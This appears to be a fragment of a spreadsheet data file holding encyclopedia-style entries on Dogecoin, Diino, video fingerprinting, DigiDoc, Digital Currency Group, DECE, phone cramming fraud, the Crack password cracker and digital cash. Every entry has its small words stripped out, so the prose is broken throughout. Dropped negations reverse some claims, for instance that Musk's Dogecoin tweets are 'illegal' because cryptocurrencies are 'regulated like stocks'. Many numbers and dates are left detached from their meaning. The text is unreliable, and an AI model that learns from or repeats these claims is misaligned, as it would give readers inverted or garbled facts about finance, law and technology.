inventor) jared birchall (representing elon musk). 2021 boom subsequent fall january 2021, dogecoin went 800% hours, attaining price $0.07, result attention reddit users, partially encouraged elon musk gamestop short squeeze. february 2021, dogecoin high price $0.08 following twitter encouragement musk, snoop dogg gene simmons. march 2021, dallas mavericks owner mark cuban announced team would allow purchasing tickets products dogecoin; within days, cuban declared franchise become dogecoin merchant, carried 20,000 transactions.in april 2021, dogecoin cryptocurrencies surged, stimulated part direct listing cryptocurrency exchange coinbase april although platform provide trading dogecoin. price first reached $0.10 april hitting high $0.45 april 400% week), volume nearly billion traded preceding hours. time, dogecoin's market capitalization approached billion, making fifth-highest-valued cryptocurrency; value increased 7,000% year-to-date. interest dogecoin contributed outage electronic trading platform robinhood's cryptocurrency system april caused "unprecedented demand", prompted concerns experts nearing speculative bubble cryptocurrency market.on 2021, value dogecoin first surpassed symbolic hurdle $0.50, greater 20,000% increase year. 2021, despite—or perhaps of—expectations surge interest dogecoin resulting elon musk's appearance saturday night live, dogecoin dropped $0.711 opening show $0.470 minutes later. following morning dogecoin swing $0.401, cumulative drop 43.6% lost value billion.as july 2022, doge fallen $0.07, $8.9 billion market makes tenth-largest cryptocoin. exchanges dogecoin altcoin large userbase, traded fiat currencies cryptocurrencies several reputable cryptocurrency exchanges retail investment platforms. trading physical, tangible items exchange doge takes place online communities reddit twitter, users circles frequently share cryptocurrency-related information.several cases people using employers' universities' computers mine dogecoin discovered.dogecoin also used attempted property sale, used pornography gambling industries. online tipping major mainstream commercial application cryptocurrency internet-based tipping systems, social media users users providing interesting noteworthy content. dogetipbot dogetipbot cryptocurrency transaction service used popular sites like reddit twitch. allowed users send dogecoins users commands reddit comments. 2017, dogetipbot discontinued taken offline creator declared bankruptcy; left many dogetipbot users losing coins stored dogetipbot system. technology defi defi (decentralized finance) form finance rely middlemen brokerages, exchanges, banks offer financial instruments. this accomplished using "smart contracts" automated enforceable agreements need intermediaries like bank lawyer, online blockchain technology instead. while dogecoin cannot interact smart contracts directly given operates chain, coins "wrapped" locked state interoperable contract later released. project enabled dogecoin (rendoge) used ethereum blockchain access defi network. most defi coins ethereum blockchain network. defi linked coins decentralized applications ("dapps") transact trade decentralized exchanges (dexs). example dexs uniswap; entirely peer-to-peer exchanges, without company institution providing platform. currency supply dogecoin started supply limit billion coins, would coins digital currencies allowing. mid-2015, billionth dogecoin mined, additional billion coins circulation every year thereafter. although theoretical supply limit, rate, number dogecoins circulation double years (the next doubling occur year 2075). there implemented hard total supply dogecoins. nonetheless, february 2014, dogecoin founder jackson palmer announced limit would removed effort create consistent reduction inflation rate time. words, inflation rate improves time starting 2015 less 2019, 2027, 2035. mining parameters dogecoin's implementation differs litecoin code forked) several parameters. dogecoin's block time minute opposed litecoin's minutes. fundraising 2014 winter olympics dogecoin community foundation encouraged fundraising charities notable causes. january 2014, fundraiser established dogecoin community raise $50,000 jamaican bobsled team, qualified for, could afford sochi winter olympics. second day, $36,000 worth dogecoin donated dogecoin bitcoin exchange rate rose 50%. dogecoin community also raised funds second sochi athlete, shiva keshavan. doge4water inspired winter olympics fundraiser smaller charity fundraising successes, dogecoin foundation, eric nakagawa, began collecting donations build well tana river basin kenya cooperation charity: water. they raise total 40,000,000 ($30,000 time) dogecoin world water (march 22). campaign succeeded, collecting donations 4,000 donors, including anonymous benefactor donated 14,000,000 dogecoin (approx. $11,000 time, $2.8m 2021). nascar march 2014, dogecoin community successfully raised 67.8 million dogecoins (around $55,000 time) effort sponsor nascar sprint series driver josh wise. nicknamed "moonrocket", featured dogecoin/reddit-sponsored paint scheme driven wise aaron's talladega superspeedway. wise featured nearly minute, race commentators discussed dogecoin crowdfunding effort, finishing twentieth narrowly avoiding multiple wrecks. wise spot sprint all-star race online vote beating household name danica patrick, largely efforts dogecoin reddit community. finished race fifteenth, last running. following race coca-cola 600, wise debuted dogecoin/reddit.com helmet. wise later announced would toyota/save mart geico thank-you gift community. finished twenty-eighth race part refueling issue; twelfth place gas-and-go stop, engage long enough, resulting second stop took towards back pack. eutechnyx, developer nascar video game, added dogecoin drivable pack.on march 2021, nascar xfinity series team mcleod motorsports announced dogecoin would sponsoring alsco uniforms vegas alongside springrates; stefan parsons drove 36th-place finish fuel line issues prevented completing race. coincidentally, father phil owner team fielded original dogecoin-sponsored 2014. criticism dogecoin's origin "joke", makes first meme coin, made difficult taken seriously mainstream media financial experts. cryptocurrency long problematic history scams. similar many cryptocurrencies, dogecoin described commentators form ponzi scheme. critics allege dogecoin investors purchased dogecoins early large financial incentive draw others purchasing dogecoins order drive price therefore benefitting early investors financially direct expense later purchasers. this primarily dogecoin supply like cryptocurrencies bitcoin, capped supply million coins. dogecoin instead deliberately stable, "deterministic inflation" rate 10,000 dogecoin block, block time minute. exactly five billion dogecoin created enter circulation every year. positives while price dogecoin volatile, volatility benefits. allows cryptocurrency day-traders, traders enter exit trade within day, trade volatility benefit extreme swings dogecoin's value. additionally, cryptocurrency begun "joke", september 2021 10th-largest cryptocurrency world, market capitalisation billion. larger coins included bitcoin, ethereum, cardano, binance coin, tether, xrp. dogecoin uses relatively little energy transactions compared cryptocurrencies (0.12 kilowatt-hours transaction (kwh)). comparison, bitcoin uses 707.6 ethereum uses 62.56 kwh. mark cuban stated dogecoin that, "doge 'deterministic inflation' meaning amount inflation defined. there uncertainty amount created inflation percentage. which could allow grow valid payment mechanism. unknown whether enough people way." elon musk dogecoin elon musk frequently uses twitter platform express views dogecoin, claim actions amount market manipulation price dogecoin frequently experiences price movements shortly dogecoin-related tweets released elon musk. nevertheless, cryptocurrencies regulated like stocks, actions illegal. musk promotion dogecoin criticized dogecoin co-founder jackson palmer, called musk "self-absorbed grifter".musk's first dogecoin-related tweet occurred december 2020. musk tweeted 'one word: doge'. shortly after, value dogecoin rose 20%.this followed series dogecoin-related tweets musk early february 2021 captioned 'dogecoin people's crypto' highs, lows, doge'. following tweets, value dogecoin rose roughly 40%.on april 2021, price dogecoin rose 100% musk tweeted image joan miró's 'dog barking moon' painting captioned 'doge barking moon'.the price dogecoin rose 2021, shortly musk tweeted doge-related meme.in 2021, price dogecoin hours musk tweeted reddit link users submit proposals improve cryptocurrency.on december 2021, dogecoin spiked elon musk said tesla accept currency means payment tesla merchandise.on june 2022, elon musk named complaint seeking damages $258 billion. complaint filed federal court manhattan plaintiff keith johnson. johnson cited musk's repeated massive social influence promote altcoin, claims artificially inflated price. also shiba (cryptocurrency) references notes external links official website</t>
  </si>
  <si>
    <t>Diino</t>
  </si>
  <si>
    <t>diino cloud storage provider, offering online backup data storage file sharing. company, diino systems founded 2004 based stockholm, sweden, sales offices atlanta, london mexico city. owners include swisscom.the service runs windows, mac, linux, android, iphone ipad platforms, allows users create simple automated rules protecting data moving diino account. service offered directly consumers sme:s, also indirectly white label solution partners telecom operators, isp:s large consumer brands. diinos current major shareholders decided wind ownership funding diino. they negotiations number potential stakeholders service taken swiss picture bank intention continue service swedish company, diino also comparison online backup services references official site about diino backupreview.info interviews nilsson, diino online backup archived 2011-09-20 wayback machine external links official site</t>
  </si>
  <si>
    <t>Digital video fingerprinting</t>
  </si>
  <si>
    <t>video fingerprinting video hashing class dimension reduction techniques system identifies, extracts, summarizes characteristic components video unique multiple perceptual hashes, enabling video uniquely identified. this technology proven effective searching comparing video files. history process video fingerprinting first developed practical philips 2002.different methods exist video fingerprinting. oostveen relied changes patterns image intensity successive video frames. this makes video fingerprinting robust limited changes color transformation color gray scale original video. others tried reduce size fingerprint looking calculating around shot changes produced video.video fingerprinting rely addition video stream. video fingerprint cannot removed, added. addition, reference video fingerprint created point, copy video. compared digital watermarking video fingerprinting confused digital watermarking, relies inserting identifying features content therefore changing content. some watermarks inserted imperceptible viewer. robust watermark difficult detect remove, removal invisible watermarks significant weakness. since watermarks must inserted video, identify copies particular video made point time. example, watermark inserted broadcast cannot used identify copies video made broadcast. watermarks offer advantages fingerprinting. unique watermark added content stage distribution process, multiple independent watermarks inserted video content. this particularly useful tracing history copy video. detecting watermarks video indicate source unauthorized copy. while video fingerprinting systems must search potentially large database reference fingerprints, watermark detection system computation detect watermark. this computation significant, multiple watermark keys must tested, watermarking fail scale volumes required commercial applications user generated video services. applications rights management distribution tracking video fingerprinting interest digital rights management (drm) area, particularly regarding distribution unauthorized content internet. video fingerprinting systems enable content providers (e.g., film studios) publishers (e.g., user-generated content (ugc) sites) determine publisher's files contain content registered fingerprint service. registered content detected, publisher take appropriate action remove site, monetize correct attribution, etc. video fingerprinting used broadcast monitoring (e.g., advertisement monitoring, news monitoring) general media monitoring. broadcast monitoring solutions inform content providers content owners playlists video content used. typical application described video fingerprinting case television productions broadcasters.from content provider's point view, video audio fingerprinting need used applications. consider online publication "mash-ups". mash-ups consist content several sources compiled together unique audio track. since audio track different original version, copyrighted material mash-ups would undetected using audio fingerprinting techniques. cases, mash-ups consist soundtrack commercial video source, like movie, used different video stream. case, video fingerprint would match, audio fingerprint would. when audio video streams masterwork, question fair arise. this discrepancy real applications global online community terms film distribution. films shown countries country origin often dubbed languages. this change audio renders films virtually unrecognizable audio fingerprinting technologies unless copies known versions fingerprinted. employing video fingerprinting, however, enables content owner fingerprint subsequent version remain recognizable. customer wishes know language soundtrack present particular video, audio fingerprint must used. another companies track leak confidential recordings videos, celebrities track presence internet unauthorized videos (for instance, videos taken amateurs using camcorder mobile phone). interactive media video fingerprinting applied smart enabling emerging category interactive television applications. television devices integrated real-time fingerprinting software automatically recognize video content on-screen order enable interactive features applications programming. entrepreneur mark cuban made investments leverage technology create interactive features cable networks hdnet successor axs.video fingerprints also used create content-aware video advertising. implementation, video service provider distributes content contains nationally broadcast commercial, localized overlay text/graphics performed national commercial. this way, national commercial local overlay information specific commercial. example, national commercial contains 15-second spot ford explorer suv, fingerprint technology, local operators overlay local dealership information phone number, promotion, etc. 15-second commercial, creating localized commercial appears targeted local audience. criminal investigation video fingerprinting also used authorities track distribution illegal content happy slapping, terrorist, child sexual abuse related videos. 2008 dutch company ziuz, together dutch police, university amsterdam developed video fingerprinting detecting child sexual abuse related videos.in april 2014 british company friend ltd. donated video fingerprinting technology (known international centre missing exploited children (icmec) help increase efficiency child pornography investigations, halt continued sharing similar files internet. icmec distributes technology enforcement agencies, software providers, online service providers hinder spread material. also acoustic fingerprint perceptual hashing video content analysis video copy detection references</t>
  </si>
  <si>
    <t>DigiDoc</t>
  </si>
  <si>
    <t>digidoc (digital document) family digital signature- cryptographic computing file formats utilizing public infrastructure. currently three generations formats, ddoc- later binary based bdoc currently used asic-e format supposed replace previous generation formats. digidoc created developed maintained (riigi infosüsteemi amet, information system authority estonia). format used legally sign optionally encrypt file(s) like text documents part electronic transaction. operations done using national card, hardware token, chip digital certificates verify person's signature mathematically. signed file container holding actual signed, unmodified files hence operation require support software created files. format container signatures created using application like qdigidoc service user's browser signing extension. when application used, container typically exchanged signing parties email attachment everyone signed complete copy. services also utilize identity cards session authentication using authentication certificate also stored id-card. technical description digidoc container contains actual files metadata, including hash represents files. when signing, software sends content hash using standardised pkcs interface user's id-card. after verifying user's pin, id-card signs hash internally returns signature stored digidoc container. during signing, certificate validity signing party checked, signed timestamp retrieved, using ocsp service. signed timestamp makes possible prove later time document signed timestamp derived document hash) signing certificate certificate revocation list time signing. signatures prior revocation still valid (therefore, documents resigned user receives certificates). asic-e asic-e (associated signature containers) extended variant latest digidoc container format. used file extension .asice. bdoc bdoc (binary document), latest version 2.1, based etsi's asic signature container standards. official estonian national standard 821:2014. files .bdoc file extension. ddoc ddoc (digical document) first generation digidoc format. files .ddoc file extension. software widely used application qdigidoc graphical desktop software runs microsoft windows, apple various linux distributions. qdigidoc open source software freely downloaded installed. applications also exist apple ipad tablet devices windows phones. currently estonian- finnish government issued cards work qdigidoc later versions. installer.id.ee qdigidoc home page. itunes.apple.com digidoc apple ipad tablets windowsphone.com digidoc windows phone software libraries multiple programming languages supported create applications services utilizing digidoc-format, including c++, java, .net, libdigidocpp library libdigidoc library digidoc4j java library also estonian identity card digital signature estonia associated signature containers finnish identity card references external links id.ee world digidoc id.ee bdoc2.1 estonian national standard digital signatures id.ee digidoc libraries installer.id.ee qdigidoc home page.</t>
  </si>
  <si>
    <t>Digital Currency Group</t>
  </si>
  <si>
    <t>digital currency group (dcg) venture capital company focusing digital currency market. located stamford, connecticut. history digital currency group launched 2015 barry silbert, graduate emory university previously secondmarket, inc. began investing blockchain technology companies 2013. shortly secondmarket’s sale, silbert formed digital currency group, genesis grayscale becoming first company’s subsidiaries.in november 2021, firm announced would relocate manhattan headquarters stamford, connecticut. subsidiaries genesis global trading genesis crypto trading, lending, asset custody platform, targeting institutional clients high worth individuals. they claim first bitcoin crypto desk, launched 2013.genesis acquired london-based crypto asset custodian company volt early 2020. genesis' sister company grayscale investments custodying crypto assets company xapo, acquired genesis' rival bitcoin trading company coinbase 2019. news media speculated genesis' crypto custody would transferred away coinbase made internal greyscale completion volt acquisition.in late june early july 2022, genesis publicly revealed left exposed hundreds millions dollars losses loans hong kong based crypto lender babel finance well bankrupt crypto hedge fund three arrows capital (3ac), parent company taken genesis' debts order keep company afloat. grayscale investments established 2013, grayscale investments digital currency asset manager. offers funds privately institutional accredited investors publicly-traded products. they world’s largest asset manager digital currency january 2021 grayscale reported managing $20.2 billion assets. grayscale also manages grayscale bitcoin investment trust (otcqx: gbtc), first publicly quoted securities solely invested price bitcoin upon launch 2013. four grayscale’s funds trade publicly otcqx trust trades symbol gbtc january 2020, grayscale bitcoin trust became first digital currency financial product become securities exchange commission reporting company. they approved public trading financial industry regulatory authority 2019.in 2018, grayscale launched grayscale digital large fund allows customer invest group prominent digital currencies. fund approved trade public markets financial industry regulatory authority october 2019. 2022, reported grayscale list exchange-traded fund (etf) first time europe. said made companies representing "future finance", begin trading coindesk coindesk global media, research, events platform acquired digital currency group 2016. reports blockchain’s daily news, provides bitcoin price index publishes quarterly state bitcoin report. coindesk also hosts conference digital currencies blockchain technologies titled consensus. allegations lending malfeasance july 2022, alleged pseudonymous crypto blogger 'finnovation' dcg, crypto lending subsidiary genesis trading group subsidiary grayscale's bitcoin investment trust (gbtc) product, engaged multi-year scheme now-bankrupt multi-billion-dollar crypto hedge fund three arrows capital (3ac) provide essentially limitless leverage exchange grayscale making fees transactions. references external links digital currency group website also list bitcoin companies</t>
  </si>
  <si>
    <t>Digital Entertainment Content Ecosystem</t>
  </si>
  <si>
    <t>digital entertainment content ecosystem (dece, llc.) consortium major film studios, consumer electronics manufacturers retailers, networking hardware vendors, systems integrators, digital rights management (drm) vendors listed below. consortium announced september 2008 president, mitch singer, also chief technology officer (cto) sony pictures entertainment time. dece chartered develop standards digital distribution premium hollywood content. consortium created rules back-end system management rules enabled consumers share purchased digital content among domain registered consumer electronics devices.dece's digital locker system named ultraviolet.amazon, apple, disney, google members dece. february 2014, disney launched digital locker system named keychest associated streaming platform named disney movies anywhere. october 2017, disney expanded keychest outside studios renamed disney movies anywhere movies anywhere. movies anywhere currently connects amazon video, fandangonow, google play/youtube, apple tv/itunes, microsoft movies vudu, verizon fios, xfinity. january 2019, servicing million users million pieces movie content, variety reported closure ultraviolet system july 2019; dece recommended confirming connections ultraviolet content vudu fandangonow connections flixster outside service's closure maintain existing digital rights. dece, entity officially dissolved august 2020. members dece members included: references</t>
  </si>
  <si>
    <t>Cramming (fraud)</t>
  </si>
  <si>
    <t>cramming form fraud small charges added bill third party without subscriber's consent, approval, authorization disclosure. these disguised tax, common bogus service, several dollars even cents. crammer's intent subscriber overlook ultimately small charges without knowing about.according u.s. national association attorneys general, cramming common consumer complaint 2007 united states. types there various forms cramming. phone cramming phone cramming practice placing unauthorized charges telecommunication subscriber's home mobile telephone bill.cramming common breakup bell system left subscribers different vendors local long-distance service. billing consolidated charges multiple vendors bill, opened opportunity (which exist elsewhere) fraudulent vendors charges consolidated bills. this telephone slamming, existing vendor replaced rival without client's informed consent. mobile operators third party direct bill scheme (chargetomobile 'payforit') controlled payforit scheme rules prevent unauthorised charging. effort prevent instances cramming, members third party billing industry implemented screening monitoring measures identify eliminate crammers. some companies offer consumer protection websites help consumers better understand phone bill detect cramming soon occurs.the federal communications commission (fcc) estimates cramming impacted tens millions american households. cramming cramming involves billing consumers page even know had. this often accomplished criminals develop pages small businesses non-profit groups little expense. while advertising service free, criminals actually engage unauthorized phone charges victim's accounts. common scam involves "rebate checks." these checks, cashed, transfer customer's internet service provider, placing monthly service charges telephone bill. this made possible telecommunications companies provide service able collect bills companies perform service telephone. preacquired accounts another "preacquired account telemarketing fraud", cramming unauthorized charges telemarketers bought obtained consumer account information prior telemarketing call, sometimes consumer's bank. fighting cramming phone companies like verizon respond removing cramming charges consumer's bill upon request, cease business company crams. verizon, customer's request, cramming block customer's account, prevents third parties adding charges. mobile operators third-party direct-to-bill scheme (chargetomobile 'payforit') controlled payforit scheme rules prevent unauthorised charges. notable cases 2005, gambino family soldier richard martino captain salvatore locascio admitted running cramming operation.following federal communications commission investigation, october 2010, verizon announced would refund million customers offset cramming charges.in october 2014, at&amp;t mobility agreed $105 million refunds penalties cramming premium-rated short messages; agreement largest settlement history; at&amp;t "accused keeping least fees, well obscuring charges bills preventing customers securing full refunds." also mail wire fraud references</t>
  </si>
  <si>
    <t>Crack (password software)</t>
  </si>
  <si>
    <t>crack unix password cracking program designed allow system administrators locate users weak passwords vulnerable dictionary attack. crack first standalone password cracker unix systems first introduce programmable dictionary generation well. crack began 1990 alec muffett, unix system administrator university wales aberystwyth, trying improve farmer's 'pwc' cracker cops. muffett found re-engineering memory management, noticeable performance increase. this total rewrite became "crack v2.0" development improve usability. public releases first public release crack version 2.7a, posted usenet newsgroups alt.sources alt.security july 1991. crack v3.2a+fcrypt, posted comp.sources.misc august 1991, introduced optimised version unix crypt() function still really faster version already available packages. release crack v4.0a november 1991, however, introduced several features made formidable tool system administrators arsenal. programmable dictionary generator network distributed password crackingcrack v5.0a released 2000 introduce features, instead concentrated improving code introducing flexibility, ability integrate crypt() variants needed attack password hashes used modern unix, linux windows systems. also bundled crack minimalist password cracker crack brute force password cracker. legal issues arising using crack randal schwartz, notable perl programming expert, 1995 prosecuted using crack password file system intel, case verdict eventually expunged.crack also used kevin mitnick hacking microsystems 1993. programmable dictionary generator while traditional password cracking tools simply pre-existing dictionary words crypt() function, crack v4.0a introduced ability apply rules word list generate modified versions word lists. these could range simple change) extremely complex documentation gives example: x&lt;8l/i/olsi1so0$=reject word unless less characters long, lowercase word, reject contain letter letter 'o', substitute 1's, substitute 0's, append sign.these rules could also process gecos field password file, allowing program stored names users addition existing word lists. crack's dictionary generation rule syntax subsequently borrowed extended solar designer john ripper. dictionary generation software crack subsequently reused muffett create cracklib, proactive password checking library bundled debian enterprise linux-derived linux distributions. network distributed password cracking password cracking inherently embarrassingly parallel crack v4.0a introduced ability network heterogeneous workstations connected shared filesystem parts distributed password cracking effort. required provide crack configuration file containing machine names, processing power rates flags required build crack machines call -network option. also computer security password cracking aircrack-ng cain abel davegrohl hashcat john ripper l0phtcrack ophcrack rainbowcrack references external links password cracking quick guide success</t>
  </si>
  <si>
    <t>Digital cash</t>
  </si>
  <si>
    <t>digital currency (digital money, electronic money electronic currency) currency, money, money-like asset primarily managed, stored exchanged digital computer systems, especially internet. types digital currencies include cryptocurrency, virtual currency central bank digital currency. digital currency recorded distributed database internet, centralized electronic computer database owned company bank, within digital files even stored-value card.digital currencies exhibit properties similar traditional currencies, generally physical form, unlike currencies printed banknotes minted coins. this lack physical form allows nearly instantaneous transactions internet removes cost associated distributing notes coins. usually issued governmental body, virtual currencies considered legal tender enable ownership transfer across governmental borders.this type currency used physical goods services, also restricted certain communities inside online game.digital money either centralized, central point control money supply (for instance, bank), decentralized, control money supply predetermined agreed upon democratically. history 1983, research paper david chaum introduced idea digital cash. 1989, founded digicash, electronic cash company, amsterdam commercialize ideas research. filed bankruptcy 1998.e-gold first widely used internet money, introduced 1996, grew several million users government shut 2008. e-gold referenced "digital currency" officials academia. 1997, coca-cola offered buying vending machines using mobile payments. paypal launched usd-denominated service 1998. 2009, bitcoin launched, marked start decentralized blockchain-based digital currencies central server, tangible assets held reserve. also known cryptocurrencies, blockchain-based digital currencies proved resistant attempt government regulate them, central organization person power turn off.origins digital currencies date back 1990s dot-com bubble. another known digital currency service liberty reserve, founded 2006; lets users convert dollars euros liberty reserve dollars euros, exchange freely another fee. several digital currency operations reputed used ponzi schemes money laundering, prosecuted u.s. government operating without licenses. coins coins, used type commodity-based digital currency tencent qq's messaging platform emerged early 2005. coins effective china said destabilizing effect chinese yuan currency speculation. recent interest cryptocurrencies prompted renewed interest digital currencies, bitcoin, introduced 2008, becoming widely used accepted digital currency. sub-types digital currency comparisons digital currency specific type meta-group name digital currency term refers specific type electronic currency specific properties. digital currency also term used include meta-group sub-types digital currency, specific meaning determined within specific legal contextual case. legally technically, already myriad legal definitions digital currency many digital currency sub-types. combining different possible properties, exists extensive number implementations creating many numerous sub-types digital currency. many governmental jurisdictions implemented unique definition digital currency, virtual currency, cryptocurrency, e-money, network money, e-cash, types digital currency. within specific government jurisdiction, different agencies regulators define different often conflicting meanings different types digital currency based specific properties specific currency type sub-type. digital versus virtual currency virtual currency defined 2012 european central bank type unregulated, digital money, issued usually controlled developers, used accepted among members specific virtual community". department treasury 2013 defined tersely medium exchange operates like currency environments, attributes real currency". department treasury also stated that, "virtual currency legal-tender status jurisdiction."according european central bank's 2015 "virtual currency schemes analysis" report, virtual currency digital representation value, issued central bank, credit institution e-money institution, which, circumstances, used alternative money. previous report october 2012, virtual currency defined type unregulated, digital money, issued usually controlled developers, used accepted among members specific virtual community.according bank international settlements' november 2015 "digital currencies" report, asset represented digital form monetary characteristics. digital currency denominated sovereign currency issued issuer responsible redeem digital money cash. case, digital currency represents electronic money (e-money). digital currency denominated units value decentralized automatic issuance considered virtual currency. such, bitcoin digital currency also type virtual currency. bitcoin alternatives based cryptographic algorithms, kinds virtual currencies also called cryptocurrencies. digital versus cryptocurrency cryptocurrency sub-type digital currency digital asset relies cryptography chain together digital signatures asset transfers, peer-to-peer networking decentralization. cases proof-of-work proof-of-stake scheme used create manage currency. cryptocurrencies allow electronic money systems decentralized. when implemented blockchain, digital ledger system record keeping system uses cryptography edit separate shards database entries distributed across many separate servers. first popular system bitcoin, peer-to-peer electronic monetary system based cryptography. digital versus traditional currency most traditional money supply bank money held computers. they considered digital currency cases. could argue increasingly cashless society means currencies becoming digital currencies, presented such. types systems centralized systems currency exchanged electronically using debit cards credit cards using electronic funds transfer point sale. mobile digital wallets number electronic money systems contactless payment transfer order facilitate easy payment give payee confidence letting electronic wallet transaction. 1994 mondex national westminster bank provided "electronic purse" residents swindon 2005 telefónica bbva bank launched payment system spain called mobipay used simple short message service facilities feature phones intended pay-as-you-go services including taxis pre-pay phone recharges bbva current bank account debit. january 2010, venmo launched mobile payment system sms, transformed social friends minor expenses like coffee, rent share restaurant bill forgotten wallet. popular college students, security issues. linked bank account, credit/debit card loaded value limit amount loss case security breach. credit cards non-major debit cards incur processing fee. september 2011, google wallet released united states make easy carry one's credit/debit cards phone. 2012 ireland's (owned telefónica) launched easytrip road tolls charged mobile phone account prepay credit. uk's invented wallet time. wallet charged regular bank accounts cards discharged participating retailers using technique known 'money messages'. service closed 2014. september 2014, apple announced iphone event. october 2014 released update work iphone apple watch. similar google wallet, apple devices only. decentralized systems digital currency implemented cases decentralized system combination currency issuance, ownership record, ownership transfer authorization validation, currency storage. bank international settlements (bis), "these schemes distinguish users based location, therefore allow value transferred users across borders. moreover, speed transaction conditional location payer payee." since 2001, european union implemented e-money directive taking pursuit prudential supervision business electronic money institutions" last amended 2009. doubts real nature electronic money arisen, since calls made connection 2007 payment services directive favor merging payment institutions electronic money institutions. such merger could mean electronic money nature bank money scriptural money. united states, electronic money governed article uniform commercial code wholesale transactions electronic fund transfer consumer transactions. provider's responsibility consumer's liability regulated regulation regulation virtual currencies pose challenges central banks, financial regulators, departments ministries finance, well fiscal authorities statistical authorities. adoption governments 2016, countries investing distributed ledger technologies (dlt) $1.4bn investments. addition, central banks engaged discussions, including implications central bank issued digital currency. hong kong's octopus card system: launched 1997 electronic purse public transportation, successful mature implementation contactless smart cards used mass transit payments. after years, percent octopus card transactions unrelated transit, accepted merchants. london transport’s oyster card system: oyster plastic smartcard hold pay-as-you-go credit, travelcards tram season tickets. oyster card used travel bus, tube, tram, dlr, london overground national rail services london. japan's felica: contactless rfid smart card, used variety ways ticketing systems public transportation, e-money, residence door keys. netherlands' chipknip: electronic cash system used netherlands, cards issued dutch banks value could loaded chipknip loading stations. people without bank, pre-paid chipknip cards could purchased various locations netherlands. january 2015, payment longer made chipknip. belgium's proton: electronic purse application debit cards belgium. introduced february 1995, means replace cash small transactions. system retired december 2014.in march 2018, marshall islands became first country issue cryptocurrency certify legal tender; currency called "sovereign". united states america commodity futures trading commission guidance commodity futures trading commission (cftc) determined virtual currencies properly defined commodities 2015. cftc warned investors pump dump schemes virtual currencies. internal revenue service guidance internal revenue service (irs) ruling notice 2014-21 defines virtual currency, cryptocurrency digital currency property; gains losses taxable within standard property policies. treasury guidance march 2013, financial crimes enforcement network issued guidance clarify u.s. bank secrecy applied persons creating, exchanging, transmitting virtual currencies. securities exchange commission guidance 2014 securities exchange commission (sec) "warned hazards bitcoin virtual currencies". york state regulation july 2014, york state department financial services proposed comprehensive regulation virtual currencies date, commonly called bitlicense. gathered input bitcoin supporters financial industry public hearings comment period october 2014 customize rules. proposal press release "sought strike appropriate balance helps protect consumers root illegal activity". criticized smaller companies favor established institutions, chinese bitcoin exchanges complained rules "overly broad application outside united states". canada bank canada explored possibility creating version currency blockchain.the bank canada teamed nation’s five largest banks blockchain consulting firm known project jasper. simulation 2016, central bank issued cad-coins onto blockchain similar ethereum. banks used cad-coins exchange money settle master accounts. china 2016, yifei, deputy governor china's central bank, people's bank china (pboc), wrote "the conditions ripe digital currencies, reduce operating costs, increase efficiency enable wide range applications". according yifei, best take advantage situation central banks take lead, supervising private digital currencies developing digital legal tender own.in october 2019, pboc announced digital renminbi would released years preparation. version currency, known dcep (digital currency electronic payment), based cryptocurrency "decoupled" banking system. announcement received variety responses: regard attempt chinese government circumvent dollars international banking settlement payments, thereby disrupting weakening america's ability leverage dollar world currency pursue broader geopolitical interests, others believe domestic control surveillance.in december 2020, pboc distributed cn¥20 million worth digital renminbi residents suzhou lottery program promote government-backed digital currency. recipients currency could make offline online purchases, expanding earlier trial require internet connection inclusion online stores program. around 20,000 transactions reported e-commerce company jd.com first hours trial. contrary online payment platforms alipay wechat pay, digital currency transaction fees. denmark danish government proposed getting obligation selected retailers accept payment cash, moving country closer "cashless" economy. danish chamber commerce backing move. nearly third danish population uses mobilepay, smartphone application transferring money. ecuador passed national assembly ecuador gives government permission make payments electronic currency proposes creation national digital currency. "electronic money stimulate economy; possible attract ecuadorian citizens, especially checking savings accounts credit cards alone. electronic currency backed assets central bank ecuador", national assembly said statement. december 2015, sistema dinero electrónico ("electronic money system") launched, making ecuador first country state-run electronic payment system. salvador 2021, legislative assembly salvador become first country world officially classify bitcoin legal currency. starting days approval, every business must accept bitcoin legal tender goods services, unless unable provide technology needed transaction. netherlands dutch central bank experimenting blockchain-based virtual currency called "dnbcoin". india unified payments interface (upi) real-time payment system instant money transfers bank accounts held participating banks india. interface developed national payments corporation india regulated reserve bank india. this digital payment system available 24*7*365. agnostic type user used person person, person business, business person business business transactions. transactions initiated payer payee. identify bank account uses unique virtual payment address (vpa) type 'accountid@bankid'. assigned bank, also self specified like email address. simplest common form 'mobilenumber@upi'. money transferred another bank account participating bank using account number bank branch details. transfers inter-bank intra-bank. intermediate holding pond money. withdraws funds directly bank account sender deposits directly recipient's bank account whenever transaction requested. sender initiate authorise transfer using step secure process: login using pass code initiate verify using passcode. receiver initiate payment request system send payer notification presenting code. receiving request, payer decline confirm payment using step process: login confirm verify. system extraordinarily user friendly extent even technophobes barely literate users adopting huge numbers. russia government-controlled sberbank russia owns yandex.money electronic payment service digital currency name. sweden sweden process replacing physical banknotes, coins mid-2017. however, banknotes coins swedish krona probably circulating half 2007 peak 12,494 kronor capita. riksbank planning begin discussions electronic currency issued central bank replace cash, complement it". deputy governor cecilia skingsley states cash continue spiral sweden, currently fairly easy cash sweden, often difficult deposit bank accounts, especially rural areas. decision currently made decision create "e-krona". speech, skingsley states: "the first question whether e-krona booked accounts whether ekrona form digitally transferable unit need underlying account structure, roughly like cash." skingsley also states: "another important question whether riksbank issue e-krona directly general public banks, banknotes coins." other questions addressed like interest rates, positive, negative, zero? switzerland 2016, city government first accepted digital currency payment city fees. zug, switzerland, added bitcoin means paying small amounts, 200, test attempt advance region advancing future technologies. order reduce risk, immediately converts bitcoin received swiss currency. swiss federal railways, government-owned railway company switzerland, sells bitcoins ticket machines. 2016, uk's chief scientific adviser, mark walport, advised government consider using blockchain-based digital currency.the chief economist bank england, central bank united kingdom, proposed abolition paper currency. bank also taken interest blockchain. 2016 embarked multi-year research programme explore implications central bank issued digital currency. bank england produced several research papers topic. suggests economic benefits issuing digital currency distributed ledger could much percent country's economic output. bank said wanted next version bank’s basic software infrastructure compatible distributed ledgers. adoption financial actors government attitude dictates tendency among established heavy financial actors risk-averse conservative. none offered services around cryptocurrencies much criticism came them. "the first mover among fidelity investments, boston based fidelity digital assets provide enterprise-grade custody solutions, cryptocurrency trading execution platform institutional advising services hours day, seven days week designed align blockchain's always-on trading cycle". work bitcoin ethereum general availability scheduled 2019. hard soft digital currencies hard electronic currency ability disputed reversed used. nearly impossible reverse transaction, justified not. similar cash. soft electronic currencies opposite hard electronic currencies. payments reversed. usually, payment reversed "clearing time." hard currency "softened" third-party service. criticism many existing digital currencies seen widespread usage, easily used exchanged. banks generally accept offer services them. there concerns cryptocurrencies extremely risky high volatility potential pump dump schemes. regulators several countries warned taken concrete regulatory 